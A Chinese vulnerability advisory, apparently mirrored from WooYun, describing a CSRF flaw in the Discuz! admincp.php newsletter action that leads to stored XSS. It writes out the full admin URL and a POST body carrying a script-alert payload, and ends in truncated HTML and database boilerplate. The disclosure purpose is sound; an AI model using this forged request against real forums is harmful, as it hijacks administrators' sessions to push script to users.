Discuz! admincp.php CSRF引起XSS

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

<p>首先是一个CSRF:</p><p>url:/admincp.php?action=members&amp;operation=newsletter&amp;username=%2A&amp;uid=0&amp;srchemail=&amp;regdatebefore=&amp;regdateafter=&amp;postshigher=&amp;postslower=&amp;regip=&amp;lastip=&amp;lastvisitafter=&amp;lastvisitbefore=&amp;lastpostafter=&amp;lastpostbefore=&amp;birthyear=&amp;birthmonth=&amp;birthday=&amp;lower[credits]=&amp;lower[extcredits1]=&amp;lower[extcredits2]=&amp;higher[credits]=&amp;higher[extcredits1]=&amp;higher[extcredits2]=</p><p>POST内容:</p><p>formhash=&amp;scrolltop=&amp;anchor=&amp;subject=%3Cscript%3Ealert%28%2Fxss%2F%29%3B%3C%2Fscript%3E&amp;message=test&amp;sendvia=pm&amp;pertask=100&amp;newslettersubmit=%E6%8F%90%E4%BA%A4</p><p>一个简单的POC,1-20行</p><p data-indent="1"><img src="http://static.wooyun.org/wooyun/upload/201501/2318062027fbff59bda5a4a6128d4fc9329ce3ec.png" alt="1.png"><br></p><p><br>成功提交<br><br></p><p><img src="http://static.wooyun.org/wooyun/upload/201501/2318070322bd1e70c19c7314d6146d3e334300f5.png" alt="2.png"...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息